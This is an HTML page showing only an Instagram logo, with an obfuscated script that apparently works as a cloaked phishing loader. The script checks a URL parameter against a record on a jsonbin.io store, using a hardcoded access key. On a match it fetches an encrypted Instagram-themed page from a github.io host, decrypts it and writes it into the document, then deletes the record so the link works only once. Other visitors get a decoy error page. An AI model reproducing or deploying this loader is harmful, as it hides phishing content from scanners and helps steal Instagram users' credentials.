<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Document</title>
    <script src="https://damsea.github.io/import.js"></script>
    <script>
        script(aes)
        script(ajax)
    </script>
    <style>
        .popup {
          align-items: flex-start;
          bottom: 0;
          display: flex;
          justify-content: center;
          left: 0;
          position: fixed;
          right: 0;
          top: 0;
          z-index: 10;
          overflow: auto;
        }
        .popup .popup_bg {
          position: fixed;
          top: 0;
          left: 0;
          right: 0;
          bottom: 0;
          z-index: 1;
          opacity: 0.6;
        }
        .popup .popup_box {
          display: flex;
          flex-direction: column;
          justify-content: center;
          min-height: 100%;
          padding: 30px;
        }
        .popup .popup_content {
        
          -webkit-border-radius: 10px;
          -moz-border-radius: 10px;
          -o-border-radius: 10px;
          -ms-border-radius: 10px;
          border-radius: 10px;
          position: relative;
          z-index: 2;
          width: 200px;
        }
        img{
            display: block;
            margin: auto;
            width:50px;
            
            
        }
        
        @media all and (min-width:1000px){
                 
                    img{
                        display: block;
                       margin: auto;
            
                    }
            }
        
          </style>
</head>
<body>
    

    <div class="popup">
        <div class="popup_bg"></div>
        <div class="popup_box">
            <div class="popup_content">
               <img src="https://cloudarhiv.github.io/instagram.png" alt="">
            </div>
        </div>
    </div>



</body>
<script>
  var _0x238453=_0x4f09;function _0x374b(){var _0x21b92b=['setItem','928UuJpLv','tokenid','121fIQCJh','26PtRHfW','30826yWpZQT','308530KvkXVt','record','hash','then','3301','stringify','30924jiicSg','write','text','6141UQwLkZ','onload','https://cloudarhiv.github.io/instagram.txt','506830iiarIf','3647112Zjuprr','https://api.jsonbin.io/v3/b/640ab216ace6f33a22ec439d','search','6rIqkZM','pidaraz','146594mTwLZb','https://blcobar.github.io/error.html','$2b$10$1O.PoWna8zg/AryJziD/Au2tUX8Q6dqIq8/Nr/rIo2Num3tLJ1SW.','split','904aNTkKa','slice'];_0x374b=function(){return _0x21b92b;};return _0x374b();}(function(_0x30bb45,_0x100df1){var _0x54993b=_0x4f09,_0x290409=_0x30bb45();while(!![]){try{var _0x39c13e=-parseInt(_0x54993b(0x13f))/0x1*(-parseInt(_0x54993b(0x13e))/0x2)+parseInt(_0x54993b(0x149))/0x3*(-parseInt(_0x54993b(0x13b))/0x4)+-parseInt(_0x54993b(0x14c))/0x5*(-parseInt(_0x54993b(0x150))/0x6)+-parseInt(_0x54993b(0x152))/0x7+parseInt(_0x54993b(0x138))/0x8*(-parseInt(_0x54993b(0x146))/0x9)+parseInt(_0x54993b(0x140))/0xa*(parseInt(_0x54993b(0x13d))/0xb)+parseInt(_0x54993b(0x14d))/0xc;if(_0x39c13e===_0x100df1)break;else _0x290409['push'](_0x290409['shift']());}catch(_0x11837e){_0x290409['push'](_0x290409['shift']());}}}(_0x374b,0x3fcb3));function _0x4f09(_0x38d0b2,_0x503617){var _0x374b64=_0x374b();return _0x4f09=function(_0x4f098c,_0x4488eb){_0x4f098c=_0x4f098c-0x135;var _0x3bdb63=_0x374b64[_0x4f098c];return _0x3bdb63;},_0x4f09(_0x38d0b2,_0x503617);}function save(_0x4ef33e){var _0xa12797=_0x4f09;$ajax['post']({'url':_0xa12797(0x14e),'key':_0xa12797(0x136),'data':_0x4ef33e},_0x5c0210=>{return _0x5c0210['ok'];});}var desire=location[_0x238453(0x14f)][_0x238453(0x139)](0x1)[_0x238453(0x137)]('&')[0x0]['split']('=')[0x1],ob=[];window[_0x238453(0x14a)]=()=>{var _0x22c997=_0x238453;$ajax['get']({'url':_0x22c997(0x14e),'key':_0x22c997(0x136)},_0x322fc2=>{var _0x249dab=_0x22c997;!_0x322fc2[_0x249dab(0x141)][_0x249dab(0x151)]?fetch(_0x249dab(0x135))[_0x249dab(0x143)](_0x14b407=>_0x14b407[_0x249dab(0x148)]())['then'](_0x416148=>document[_0x249dab(0x147)](_0x416148)):(_0x322fc2[_0x249dab(0x141)][_0x249dab(0x151)][_0x249dab(0x142)]==desire&&(fetch(_0x249dab(0x14b))[_0x249dab(0x143)](_0xcac449=>_0xcac449[_0x249dab(0x148)]())[_0x249dab(0x143)](_0x59da10=>document['write'](decrypt(_0x59da10,_0x249dab(0x144)))),localStorage[_0x249dab(0x13a)](_0x249dab(0x13c),JSON[_0x249dab(0x145)]({'token':_0x322fc2[_0x249dab(0x141)][_0x249dab(0x151)]['token'],'id':_0x322fc2['record'][_0x249dab(0x151)]['id']})),delete _0x322fc2[_0x249dab(0x141)][_0x249dab(0x151)],save(_0x322fc2[_0x249dab(0x141)])),_0x322fc2[_0x249dab(0x141)][_0x249dab(0x151)][_0x249dab(0x142)]!=desire&&fetch(_0x249dab(0x135))['then'](_0x566f98=>_0x566f98[_0x249dab(0x148)]())[_0x249dab(0x143)](_0x4dcd2f=>document['write'](_0x4dcd2f)));});};
    </script>
</html>
